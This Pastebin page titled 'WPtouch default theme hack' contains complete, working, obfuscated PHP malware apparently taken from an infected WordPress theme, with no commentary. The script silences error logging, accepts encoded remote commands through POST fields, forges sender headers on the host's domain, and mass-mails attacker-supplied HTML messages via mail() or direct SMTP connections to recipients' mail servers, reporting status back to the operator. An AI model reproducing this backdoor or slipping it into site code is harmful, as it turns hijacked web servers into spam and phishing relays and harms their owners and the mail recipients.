daily pastebin goal
59%
SHARE
TWEET

WPtouch default theme hack

a guest Jul 27th, 2013 64 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
 1. <?php
 2. @error_reporting(0);
 3. @ini_set('error_log', NULL);
 4. @ini_set('log_errors', 0);
 5. if (count($_POST) < 2) {
 6.     die(PHP_OS . chr(49) . chr(48) . chr(43) . md5(0987654321));
 7. }
 8. $v5031e998 = false;
 9. foreach (array_keys($_POST) as $v3c6e0b8a) {
 10.     switch ($v3c6e0b8a[0]) {
 11.         case chr(108):
 12.             $vd56b6998 = $v3c6e0b8a;
 13.             break;
 14.         case chr(100):
 15.             $v8d777f38 = $v3c6e0b8a;
 16.             break;
 17.         case chr(109):
 18.             $v3d26b0b1 = $v3c6e0b8a;
 19.             break;
 20.         case chr(101);
 21.             $v5031e998 = true;
 22.             break;
 23.     }
 24. }
 25. if ($vd56b6998 === '' || $v8d777f38 === '')
 26.     die(PHP_OS . chr(49) . chr(49) . chr(43) . md5(0987654321));
 27. $v619d75f8 = preg_split('/\,(\ +)?/', @ini_get('disable_functions'));
 28. $v01b6e203 = @$_POST[$vd56b6998];
 29. $v8d777f38 = @$_POST[$v8d777f38];
 30. $v3d26b0b1 = @$_POST[$v3d26b0b1];
 31. if ($v5031e998) {
 32.     $v01b6e203 = n9a2d8ce3($v01b6e203);
 33.     $v8d777f38 = n9a2d8ce3($v8d777f38);
 34.     $v3d26b0b1 = n9a2d8ce3($v3d26b0b1);
 35. }
 36. $v01b6e203 = urldecode(stripslashes($v01b6e203));
 37. $v8d777f38 = urldecode(stripslashes($v8d777f38));
 38. $v3d26b0b1 = urldecode(stripslashes($v3d26b0b1));
 39. if (strpos($v01b6e203, '#', 1) != false) {
 40.     $v16a9b63f = preg_split('/#/', $v01b6e203);
 41.     $ve2942a04 = count($v16a9b63f);
 42. } else {
 43.     $v16a9b63f[0] = $v01b6e203;
 44.     $ve2942a04    = 1;
 45. }
 46. for ($v865c0c0b = 0; $v865c0c0b < $ve2942a04; $v865c0c0b++) {
 47.     $v01b6e203 = $v16a9b63f[$v865c0c0b];
 48.     if ($v01b6e203 == '' || !strpos($v01b6e203, '@', 1))
 49.         continue;
 50.     if (strpos($v01b6e203, ';', 1) != false) {
 51.         list($va3da707b, $vbfbb12dc, $v081bde0c) = preg_split('/;/', strtolower($v01b6e203));
 52.         $va3da707b = ucfirst($va3da707b);
 53.         $vbfbb12dc = ucfirst($vbfbb12dc);
 54.         $v3a5939e4 = next(explode('@', $v081bde0c));
 55.         if ($vbfbb12dc == '' || $va3da707b == '') {
 56.             $vbfbb12dc = $va3da707b = '';
 57.             $v01b6e203 = $v081bde0c;
 58.         } else {
 59.             $v01b6e203 = "\"$va3da707b $vbfbb12dc\" <$v081bde0c>";
 60.         }
 61.     } else {
 62.         $vbfbb12dc = $va3da707b = '';
 63.         $v081bde0c = strtolower($v01b6e203);
 64.         $v3a5939e4 = next(explode('@', $v01b6e203));
 65.     }
 66.     preg_match('|<USER>(.*)</USER>|imsU', $v8d777f38, $vee11cbb1);
 67.     $vee11cbb1 = $vee11cbb1[1];
 68.     preg_match('|<NAME>(.*)</NAME>|imsU', $v8d777f38, $vb068931c);
 69.     $vb068931c = $vb068931c[1];
 70.     preg_match('|<SUBJ>(.*)</SUBJ>|imsU', $v8d777f38, $vc34487c9);
 71.     $vc34487c9 = $vc34487c9[1];
 72.     preg_match('|<SBODY>(.*)</SBODY>|imsU', $v8d777f38, $v6f4b5f42);
 73.     $v6f4b5f42 = $v6f4b5f42[1];
 74.     $vc34487c9 = str_replace("%R_NAME%", $va3da707b, $vc34487c9);
 75.     $vc34487c9 = str_replace("%R_LNAME%", $vbfbb12dc, $vc34487c9);
 76.     $v6f4b5f42 = str_replace("%R_NAME%", $va3da707b, $v6f4b5f42);
 77.     $v6f4b5f42 = str_replace("%R_LNAME%", $vbfbb12dc, $v6f4b5f42);
 78.     $v0897acf4 = preg_replace('/^(www|ftp)\./i', '', @$_SERVER['HTTP_HOST']);
 79.     if (ne667da76($v0897acf4) || @ini_get('safe_mode'))
 80.         $v10497e3f = false;
 81.     else
 82.         $v10497e3f = true;
 83.     $v9a5cb5d8 = "$vee11cbb1@$v0897acf4";
 84.     if ($vb068931c != '')
 85.         $vd98a07f8 = "$vb068931c <$v9a5cb5d8>";
 86.     else
 87.         $vd98a07f8 = $v9a5cb5d8;
 88.     $vb8ddc93f = "From: $vd98a07f8\r\n";
 89.     $vb8ddc93f .= "Reply-To: $vd98a07f8\r\n";
 90.     $v3c87b187 = "X-Priority: 3 (Normal)\r\n";
 91.     $v3c87b187 .= "MIME-Version: 1.0\r\n";
 92.     $v3c87b187 .= "Content-Type: text/html; charset=\"iso-8859-1\"\r\n";
 93.     $v3c87b187 .= "Content-Transfer-Encoding: 8bit\r\n";
 94.     if (!in_array('mail', $v619d75f8)) {
 95.         if ($v10497e3f) {
 96.             if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $vb8ddc93f . $v3c87b187, "-f$v9a5cb5d8")) {
 97.                 echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
 98.                 continue;
 99.             }
 100.         } else {
 101.             if (@mail($v01b6e203, $vc34487c9, $v6f4b5f42, $v3c87b187)) {
 102.                 echo (chr(79) . chr(75) . md5(1234567890) . "+0\n");
 103.                 continue;
 104.             }
 105.         }
 106.     }
 107.     $v4340fd73 = "Date: " . @date("D, j M Y G:i:s O") . "\r\n" . $vb8ddc93f;
 108.     $v4340fd73 .= "Message-ID: <" . preg_replace('/(.{7})(.{5})(.{2}).*/', '$1-$2-$3', md5(time())) . "@$v0897acf4>\r\n";
 109.     $v4340fd73 .= "To: $v01b6e203\r\n";
 110.     $v4340fd73 .= "Subject: $vc34487c9\r\n";
 111.     $v4340fd73 .= $v3c87b187;
 112.     $v841a2d68 = $v4340fd73 . "\r\n" . $v6f4b5f42;
 113.     if ($v3d26b0b1 == '')
 114.         $v3d26b0b1 = n9c812bad($v3a5939e4);
 115.     if (($vb4a88417 = n7b0ecdff($v9a5cb5d8, $v081bde0c, $v841a2d68, $v0897acf4, $v3d26b0b1)) == 0) {
 116.         echo (chr(79) . chr(75) . md5(1234567890) . "+1\n");
 117.         continue;
 118.     } else {
 119.         echo PHP_OS . chr(50) . chr(48) . '+' . md5(0987654321) . "+$vb4a88417\n";
 120.     }
 121. }
 122. function ne667da76($v957b527b)
 123. {
 124.     return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/", $v957b527b);
 125. }
 126. function na73fa8bd($vb45cffe0, $v11a95b8a = 0, $v7fa1b685 = "=\r\n", $v92f21a0f = 0, $v3303c65a = false)
 127. {
 128.     $vf5a8e923 = strlen($vb45cffe0);
 129.     $vb4a88417 = '';
 130.     for ($v865c0c0b = 0; $v865c0c0b < $vf5a8e923; $v865c0c0b++) {
 131.         if ($v11a95b8a >= 75) {
 132.             $v11a95b8a = $v92f21a0f;
 133.             $vb4a88417 .= $v7fa1b685;
 134.         }
 135.         $v4a8a08f0 = ord($vb45cffe0[$v865c0c0b]);
 136.         if (($v4a8a08f0 == 0x3d) || ($v4a8a08f0 >= 0x80) || ($v4a8a08f0 < 0x20)) {
 137.             if ((($v4a8a08f0 == 0x0A) || ($v4a8a08f0 == 0x0D)) && (!$v3303c65a)) {
 138.                 $vb4a88417 .= chr($v4a8a08f0);
 139.                 $v11a95b8a = 0;
 140.                 continue;
 141.             }
 142.             $vb4a88417 .= '=' . str_pad(strtoupper(dechex($v4a8a08f0)), 2, '0', STR_PAD_LEFT);
 143.             $v11a95b8a += 3;
 144.             continue;
 145.         }
 146.         $vb4a88417 .= chr($v4a8a08f0);
 147.         $v11a95b8a++;
 148.     }
 149.     return $vb4a88417;
 150. }
 151. function n7b0ecdff($vd98a07f8, $v01b6e203, $v841a2d68, $v0897acf4, $v3d26b0b1)
 152. {
 153.     global $v619d75f8;
 154.     if (!in_array('fsockopen', $v619d75f8))
 155.         $v66b18866 = @fsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
 156.     elseif (!in_array('pfsockopen', $v619d75f8))
 157.         $v66b18866 = @pfsockopen($v3d26b0b1, 25, $v70106d0d, $v809b1abe, 20);
 158.     elseif (!in_array('stream_socket_client', $v619d75f8) && function_exists("stream_socket_client"))
 159.         $v66b18866 = @stream_socket_client("tcp://$v3d26b0b1:25", $v70106d0d, $v809b1abe, 20);
 160.     else
 161.         return -1;
 162.     if (!$v66b18866) {
 163.         return 1;
 164.     } else {
 165.         $v8d777f38 = n54070395($v66b18866);
 166.         @fputs($v66b18866, "EHLO $v0897acf4\r\n");
 167.         $ve98d2f00 = n54070395($v66b18866);
 168.         if (substr($ve98d2f00, 0, 3) != 250)
 169.             return "2+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 170.         @fputs($v66b18866, "MAIL FROM:<$vd98a07f8>\r\n");
 171.         $ve98d2f00 = n54070395($v66b18866);
 172.         if (substr($ve98d2f00, 0, 3) != 250)
 173.             return "3+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 174.         @fputs($v66b18866, "RCPT TO:<$v01b6e203>\r\n");
 175.         $ve98d2f00 = n54070395($v66b18866);
 176.         if (substr($ve98d2f00, 0, 3) != 250 && substr($ve98d2f00, 0, 3) != 251)
 177.             return "4+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 178.         @fputs($v66b18866, "DATA\r\n");
 179.         $ve98d2f00 = n54070395($v66b18866);
 180.         if (substr($ve98d2f00, 0, 3) != 354)
 181.             return "5+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 182.         @fputs($v66b18866, $v841a2d68 . "\r\n.\r\n");
 183.         $ve98d2f00 = n54070395($v66b18866);
 184.         if (substr($ve98d2f00, 0, 3) != 250)
 185.             return "6+($v01b6e203)+" . preg_replace('/(\r\n|\r|\n)/', '|', $ve98d2f00);
 186.         @fputs($v66b18866, "QUIT\r\n");
 187.         @fclose($v66b18866);
 188.         return 0;
 189.     }
 190. }
 191. function n54070395($v66b18866)
 192. {
 193.     $v8d777f38 = '';
 194.     while ($v341be97d = @fgets($v66b18866, 4096)) {
 195.         $v8d777f38 .= $v341be97d;
 196.         if (substr($v341be97d, 3, 1) == ' ')
 197.             break;
 198.     }
 199.     return $v8d777f38;
 200. }
 201. function n9c812bad($vad5f82e8)
 202. {
 203.     global $v619d75f8;
 204.     if (!in_array('getmxrr', $v619d75f8) && function_exists("getmxrr")) {
 205.         @getmxrr($vad5f82e8, $v744fa43b, $v6c5ea816);
 206.         if (count($v744fa43b) === 0)
 207.             return '127.0.0.1';
 208.         $v865c0c0b = array_keys($v6c5ea816, min($v6c5ea816));
 209.         return $v744fa43b[$v865c0c0b[0]];
 210.     } else {
 211.         return '127.0.0.1';
 212.     }
 213. }
 214. function n9a2d8ce3($v1cb251ec)
 215. {
 216.     $v1cb251ec = base64_decode($v1cb251ec);
 217.     $vc68271a6 = '';
 218.     for ($v865c0c0b = 0; $v865c0c0b < strlen($v1cb251ec); $v865c0c0b++)
 219.         $vc68271a6 .= chr(ord($v1cb251ec[$v865c0c0b]) ^ 2);
 220.     return $vc68271a6;
 221. }
 222. ?>
RAW Paste Data
Top